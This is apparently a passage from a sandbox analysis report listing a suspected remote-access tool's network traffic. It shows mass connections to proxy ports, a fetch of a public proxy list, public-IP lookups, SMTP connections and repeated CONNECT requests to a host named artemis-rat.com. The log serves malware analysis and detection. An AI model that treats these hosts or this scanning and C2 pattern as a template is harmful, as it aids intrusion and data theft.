                  Source: global trafficTCP traffic: 192.168.2.9:50085 -> 202.6.224.52:1080
                  Source: global trafficTCP traffic: 192.168.2.9:50086 -> 87.255.200.108:60080
                  Source: global trafficTCP traffic: 192.168.2.9:50087 -> 197.211.244.135:5678
                  Source: global trafficTCP traffic: 192.168.2.9:50090 -> 111.59.4.88:9002
                  Source: global trafficTCP traffic: 192.168.2.9:50091 -> 148.66.130.53:56350
                  Source: global trafficTCP traffic: 192.168.2.9:50092 -> 103.81.115.210:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50093 -> 186.24.9.114:999
                  Source: global trafficTCP traffic: 192.168.2.9:50096 -> 218.6.120.111:7777
                  Source: global trafficTCP traffic: 192.168.2.9:50098 -> 117.202.20.69:1088
                  Source: global trafficTCP traffic: 192.168.2.9:50099 -> 203.160.57.87:5678
                  Source: global trafficTCP traffic: 192.168.2.9:50100 -> 51.77.65.164:31979
                  Source: global trafficTCP traffic: 192.168.2.9:50101 -> 51.158.108.134:16379
                  Source: global trafficTCP traffic: 192.168.2.9:50104 -> 67.213.212.50:40080
                  Source: global trafficTCP traffic: 192.168.2.9:50105 -> 23.225.72.122:3500
                  Source: global trafficTCP traffic: 192.168.2.9:50106 -> 203.76.117.74:4153
                  Source: global trafficTCP traffic: 192.168.2.9:50107 -> 146.59.18.246:40975
                  Source: global trafficTCP traffic: 192.168.2.9:50108 -> 66.228.140.209:8899
                  Source: global trafficTCP traffic: 192.168.2.9:50110 -> 186.215.87.194:6022
                  Source: global trafficTCP traffic: 192.168.2.9:50111 -> 103.167.68.77:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50112 -> 159.112.141.44:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50113 -> 183.179.187.16:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50114 -> 67.213.210.118:54924
                  Source: global trafficTCP traffic: 192.168.2.9:50115 -> 115.221.242.131:9999
                  Source: global trafficTCP traffic: 192.168.2.9:50116 -> 81.12.104.43:3629
                  Source: global trafficTCP traffic: 192.168.2.9:50117 -> 156.232.9.194:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50118 -> 62.171.133.66:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50119 -> 138.0.143.128:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50121 -> 155.50.213.149:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50124 -> 162.241.46.6:50062
                  Source: global trafficTCP traffic: 192.168.2.9:50127 -> 181.78.74.78:999
                  Source: global trafficTCP traffic: 192.168.2.9:50126 -> 64.124.145.1:1080
                  Source: global trafficTCP traffic: 192.168.2.9:50128 -> 47.113.179.6:10705
                  Source: global trafficTCP traffic: 192.168.2.9:50130 -> 185.200.38.117:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50131 -> 103.182.112.11:8000
                  Source: global trafficTCP traffic: 192.168.2.9:50133 -> 190.153.121.2:4145
                  Source: global trafficTCP traffic: 192.168.2.9:50134 -> 45.134.80.222:3129
                  Source: global trafficTCP traffic: 192.168.2.9:50135 -> 5.58.33.187:55507
                  Source: global trafficTCP traffic: 192.168.2.9:50136 -> 167.86.115.103:55066
                  Source: global trafficTCP traffic: 192.168.2.9:50137 -> 161.97.173.78:26552
                  Source: global trafficTCP traffic: 192.168.2.9:50141 -> 171.248.209.6:1080
                  Source: global trafficTCP traffic: 192.168.2.9:50142 -> 177.234.194.226:999
                  Source: global trafficTCP traffic: 192.168.2.9:50144 -> 169.255.198.8:5678
                  Source: global trafficTCP traffic: 192.168.2.9:50145 -> 45.229.34.174:999
                  Source: global trafficTCP traffic: 192.168.2.9:50146 -> 103.153.40.38:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50147 -> 64.44.139.12:20037
                  Source: global trafficTCP traffic: 192.168.2.9:50148 -> 194.186.35.70:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50150 -> 173.212.237.43:63614
                  Source: global trafficTCP traffic: 192.168.2.9:50151 -> 213.165.168.190:9898
                  Source: global trafficTCP traffic: 192.168.2.9:50153 -> 188.132.222.40:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50152 -> 179.125.51.54:27234
                  Source: global trafficTCP traffic: 192.168.2.9:50156 -> 212.110.188.222:34411
                  Source: global trafficTCP traffic: 192.168.2.9:50157 -> 146.190.51.181:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50155 -> 36.134.91.82:8888
                  Source: global trafficTCP traffic: 192.168.2.9:50158 -> 132.148.245.247:7183
                  Source: global trafficTCP traffic: 192.168.2.9:50159 -> 117.160.250.163:9990
                  Source: global trafficTCP traffic: 192.168.2.9:50160 -> 193.56.255.179:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50164 -> 80.251.219.40:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50166 -> 103.230.49.132:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50167 -> 51.222.84.118:21777
                  Source: global trafficTCP traffic: 192.168.2.9:50169 -> 177.234.194.158:999
                  Source: global trafficTCP traffic: 192.168.2.9:50170 -> 103.148.130.5:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50171 -> 162.241.53.72:57364
                  Source: global trafficTCP traffic: 192.168.2.9:50172 -> 106.45.221.168:3256
                  Source: global trafficTCP traffic: 192.168.2.9:50173 -> 174.75.211.222:4145
                  Source: global trafficTCP traffic: 192.168.2.9:50174 -> 162.241.158.204:41274
                  Source: global trafficTCP traffic: 192.168.2.9:50175 -> 83.151.4.172:47036
                  Source: global trafficTCP traffic: 192.168.2.9:50177 -> 41.223.232.117:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50176 -> 165.232.89.116:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50178 -> 189.240.60.163:9090
                  Source: global trafficTCP traffic: 192.168.2.9:50179 -> 89.34.198.253:5678
                  Source: global trafficTCP traffic: 192.168.2.9:50180 -> 185.217.136.67:1337
                  Source: global trafficTCP traffic: 192.168.2.9:50181 -> 20.204.214.79:3129
                  Source: global trafficTCP traffic: 192.168.2.9:50184 -> 185.208.102.62:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50186 -> 154.64.219.2:8888
                  Source: global trafficTCP traffic: 192.168.2.9:50185 -> 45.184.155.3:999
                  Source: global trafficTCP traffic: 192.168.2.9:50187 -> 161.97.132.227:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50189 -> 162.214.227.68:34071
                  Source: global trafficTCP traffic: 192.168.2.9:50190 -> 183.89.9.82:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50191 -> 194.4.50.62:12334
                  Source: global trafficTCP traffic: 192.168.2.9:50192 -> 27.130.253.68:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50193 -> 138.201.21.232:49775
                  Source: global trafficTCP traffic: 192.168.2.9:50196 -> 154.205.152.96:9080
                  Source: global trafficTCP traffic: 192.168.2.9:50197 -> 199.223.255.109:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50201 -> 132.148.128.88:29745
                  Source: global trafficTCP traffic: 192.168.2.9:50199 -> 114.232.109.43:8089
                  Source: global trafficTCP traffic: 192.168.2.9:50203 -> 161.97.74.176:30000
                  Source: global trafficTCP traffic: 192.168.2.9:50202 -> 46.209.54.102:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50204 -> 102.23.234.201:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50206 -> 91.189.177.186:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50205 -> 199.102.107.145:4145
                  Source: global trafficTCP traffic: 192.168.2.9:50207 -> 13.208.168.179:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50209 -> 206.189.9.30:42331
                  Source: global trafficTCP traffic: 192.168.2.9:50210 -> 159.192.102.249:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50211 -> 110.185.105.210:51800
                  Source: global trafficTCP traffic: 192.168.2.9:50214 -> 66.225.246.238:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50212 -> 186.251.255.41:31337
                  Source: global trafficTCP traffic: 192.168.2.9:50215 -> 68.1.210.163:4145
                  Source: global trafficTCP traffic: 192.168.2.9:50217 -> 81.199.14.49:1088
                  Source: global trafficTCP traffic: 192.168.2.9:50219 -> 209.14.112.8:1080
                  Source: global trafficTCP traffic: 192.168.2.9:50221 -> 34.84.95.189:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50225 -> 124.163.236.54:7302
                  Source: global trafficTCP traffic: 192.168.2.9:50224 -> 206.189.145.23:49614
                  Source: global trafficTCP traffic: 192.168.2.9:50226 -> 103.53.110.45:10801
                  Source: global trafficTCP traffic: 192.168.2.9:50227 -> 103.159.66.61:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50228 -> 24.249.199.4:4145
                  Source: global trafficTCP traffic: 192.168.2.9:50230 -> 103.59.190.209:56252
                  Source: global trafficTCP traffic: 192.168.2.9:50231 -> 199.102.106.94:4145
                  Source: global trafficTCP traffic: 192.168.2.9:50233 -> 165.154.227.154:5096
                  Source: global trafficTCP traffic: 192.168.2.9:50234 -> 67.43.227.227:4711
                  Source: global trafficTCP traffic: 192.168.2.9:50235 -> 128.199.221.91:49865
                  Source: global trafficTCP traffic: 192.168.2.9:50236 -> 43.129.228.46:7891
                  Source: global trafficTCP traffic: 192.168.2.9:50237 -> 101.255.62.129:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50241 -> 216.176.187.99:8889
                  Source: global trafficTCP traffic: 192.168.2.9:50242 -> 43.132.184.228:8181
                  Source: global trafficTCP traffic: 192.168.2.9:50244 -> 188.168.24.222:81
                  Source: global trafficTCP traffic: 192.168.2.9:50245 -> 202.179.188.178:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50246 -> 142.4.7.20:43100
                  Source: global trafficTCP traffic: 192.168.2.9:50248 -> 162.214.165.6:42624
                  Source: global trafficTCP traffic: 192.168.2.9:50250 -> 103.129.3.246:83
                  Source: global trafficTCP traffic: 192.168.2.9:50251 -> 191.97.2.198:5678
                  Source: global trafficTCP traffic: 192.168.2.9:50253 -> 197.232.65.40:55443
                  Source: global trafficTCP traffic: 192.168.2.9:50252 -> 194.150.69.56:8888
                  Source: global trafficTCP traffic: 192.168.2.9:50256 -> 54.212.22.168:1080
                  Source: global trafficTCP traffic: 192.168.2.9:50258 -> 38.41.0.94:999
                  Source: global trafficTCP traffic: 192.168.2.9:50259 -> 45.176.97.90:999
                  Source: global trafficTCP traffic: 192.168.2.9:50260 -> 222.138.76.6:9002
                  Source: global trafficTCP traffic: 192.168.2.9:50261 -> 3.25.234.175:8888
                  Source: global trafficTCP traffic: 192.168.2.9:50262 -> 186.125.218.145:999
                  Source: global trafficTCP traffic: 192.168.2.9:50264 -> 128.199.252.41:8000
                  Source: global trafficTCP traffic: 192.168.2.9:50267 -> 1.2.209.194:4145
                  Source: global trafficTCP traffic: 192.168.2.9:50268 -> 103.35.189.217:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50269 -> 162.241.46.40:49401
                  Source: global trafficTCP traffic: 192.168.2.9:50270 -> 91.202.230.219:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50271 -> 13.40.239.130:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50272 -> 83.56.15.57:5678
                  Source: global trafficTCP traffic: 192.168.2.9:50273 -> 45.159.150.23:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50277 -> 95.31.42.199:3629
                  Source: global trafficTCP traffic: 192.168.2.9:50278 -> 203.96.177.211:48553
                  Source: global trafficTCP traffic: 192.168.2.9:50279 -> 50.199.46.20:32100
                  Source: global trafficTCP traffic: 192.168.2.9:50280 -> 103.112.254.66:5678
                  Source: global trafficTCP traffic: 192.168.2.9:50281 -> 119.42.71.103:4145
                  Source: global trafficTCP traffic: 192.168.2.9:50282 -> 95.217.104.21:24815
                  Source: global trafficTCP traffic: 192.168.2.9:50283 -> 190.61.41.165:999
                  Source: global trafficTCP traffic: 192.168.2.9:50288 -> 167.172.79.17:8000
                  Source: global trafficTCP traffic: 192.168.2.9:50289 -> 86.107.178.109:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50291 -> 4.236.183.37:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50293 -> 103.49.28.23:12113
                  Source: global trafficTCP traffic: 192.168.2.9:50294 -> 51.68.164.77:32824
                  Source: global trafficTCP traffic: 192.168.2.9:50295 -> 14.225.254.128:5555
                  Source: global trafficTCP traffic: 192.168.2.9:50296 -> 139.99.148.90:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50297 -> 94.131.203.7:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50298 -> 94.153.163.226:81
                  Source: global trafficTCP traffic: 192.168.2.9:50299 -> 170.239.207.241:999
                  Source: global trafficTCP traffic: 192.168.2.9:50300 -> 162.19.7.56:44195
                  Source: global trafficTCP traffic: 192.168.2.9:50302 -> 103.124.196.134:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50303 -> 51.79.87.144:22500
                  Source: global trafficTCP traffic: 192.168.2.9:50304 -> 157.245.131.28:30422
                  Source: global trafficTCP traffic: 192.168.2.9:50307 -> 38.54.116.9:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50308 -> 103.170.115.213:2020
                  Source: global trafficTCP traffic: 192.168.2.9:50309 -> 103.84.178.2:4153
                  Source: global trafficTCP traffic: 192.168.2.9:50311 -> 163.172.131.178:16379
                  Source: global trafficTCP traffic: 192.168.2.9:50312 -> 45.234.61.173:999
                  Source: global trafficTCP traffic: 192.168.2.9:50314 -> 178.115.253.35:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50316 -> 194.145.209.187:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50317 -> 89.171.116.65:65000
                  Source: global trafficTCP traffic: 192.168.2.9:50318 -> 181.78.19.248:999
                  Source: global trafficTCP traffic: 192.168.2.9:50319 -> 203.161.30.10:8765
                  Source: global trafficTCP traffic: 192.168.2.9:50320 -> 212.31.100.138:4153
                  Source: global trafficTCP traffic: 192.168.2.9:50321 -> 46.101.102.134:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50322 -> 109.75.34.152:59341
                  Source: global trafficTCP traffic: 192.168.2.9:50323 -> 95.84.166.138:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50324 -> 177.91.76.34:4153
                  Source: global trafficTCP traffic: 192.168.2.9:50325 -> 46.209.207.153:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50326 -> 197.234.13.36:4145
                  Source: global trafficTCP traffic: 192.168.2.9:50329 -> 92.255.190.41:4153
                  Source: global trafficTCP traffic: 192.168.2.9:50330 -> 173.249.29.243:9123
                  Source: global trafficTCP traffic: 192.168.2.9:50331 -> 62.171.184.96:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50333 -> 202.124.46.97:4145
                  Source: global trafficTCP traffic: 192.168.2.9:50332 -> 171.100.23.244:5678
                  Source: global trafficTCP traffic: 192.168.2.9:50334 -> 162.240.239.103:42771
                  Source: global trafficTCP traffic: 192.168.2.9:50336 -> 103.48.68.101:83
                  Source: global trafficTCP traffic: 192.168.2.9:50337 -> 117.70.49.27:8089
                  Source: global trafficTCP traffic: 192.168.2.9:50338 -> 190.97.238.88:999
                  Source: global trafficTCP traffic: 192.168.2.9:50339 -> 41.65.236.37:1981
                  Source: global trafficTCP traffic: 192.168.2.9:50340 -> 162.19.7.53:64654
                  Source: global trafficTCP traffic: 192.168.2.9:50343 -> 209.142.64.219:39789
                  Source: global trafficTCP traffic: 192.168.2.9:50342 -> 190.95.195.105:999
                  Source: global trafficTCP traffic: 192.168.2.9:50344 -> 51.158.68.68:8811
                  Source: global trafficTCP traffic: 192.168.2.9:50345 -> 190.90.22.106:999
                  Source: global trafficTCP traffic: 192.168.2.9:50347 -> 181.204.0.36:999
                  Source: global trafficTCP traffic: 192.168.2.9:50348 -> 179.60.219.63:999
                  Source: global trafficTCP traffic: 192.168.2.9:50350 -> 137.59.161.177:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50351 -> 116.5.187.116:7890
                  Source: global trafficTCP traffic: 192.168.2.9:50352 -> 201.144.20.231:5678
                  Source: global trafficTCP traffic: 192.168.2.9:50353 -> 202.40.181.220:31247
                  Source: global trafficTCP traffic: 192.168.2.9:50354 -> 182.52.229.165:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50355 -> 136.244.99.51:8888
                  Source: global trafficTCP traffic: 192.168.2.9:50356 -> 103.234.28.211:8181
                  Source: global trafficTCP traffic: 192.168.2.9:50357 -> 201.71.3.42:999
                  Source: global trafficTCP traffic: 192.168.2.9:50363 -> 128.199.196.31:27102
                  Source: global trafficTCP traffic: 192.168.2.9:50362 -> 45.117.179.179:6522
                  Source: global trafficTCP traffic: 192.168.2.9:50364 -> 197.234.13.17:4145
                  Source: global trafficTCP traffic: 192.168.2.9:50365 -> 191.97.9.228:999
                  Source: global trafficTCP traffic: 192.168.2.9:50366 -> 51.161.131.84:49202
                  Source: global trafficTCP traffic: 192.168.2.9:50367 -> 95.57.216.118:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50368 -> 5.78.89.192:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50371 -> 154.73.29.161:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50372 -> 45.113.80.37:9050
                  Source: global trafficTCP traffic: 192.168.2.9:50373 -> 202.162.219.10:1080
                  Source: global trafficTCP traffic: 192.168.2.9:50375 -> 189.173.223.225:999
                  Source: global trafficTCP traffic: 192.168.2.9:50376 -> 152.136.151.195:2080
                  Source: global trafficTCP traffic: 192.168.2.9:50377 -> 162.241.137.197:60200
                  Source: global trafficTCP traffic: 192.168.2.9:50378 -> 213.184.153.66:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50379 -> 220.194.189.144:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50381 -> 72.195.114.169:4145
                  Source: global trafficTCP traffic: 192.168.2.9:50382 -> 103.176.96.132:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50386 -> 91.148.127.162:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50387 -> 20.106.146.212:6001
                  Source: global trafficTCP traffic: 192.168.2.9:50389 -> 37.32.98.160:37758
                  Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 93.171.243.253 93.171.243.253
                  Source: Joe Sandbox ViewIP Address: 212.110.188.202 212.110.188.202
                  Source: Joe Sandbox ViewIP Address: 212.110.188.202 212.110.188.202
                  Source: Joe Sandbox ViewIP Address: 24.230.33.96 24.230.33.96
                  Source: Joe Sandbox ViewASN Name: BYTEMARK-ASGB BYTEMARK-ASGB
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: global trafficTCP traffic: 192.168.2.9:49726 -> 160.248.80.91:587
                  Source: global trafficTCP traffic: 192.168.2.9:55229 -> 208.91.199.224:587
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
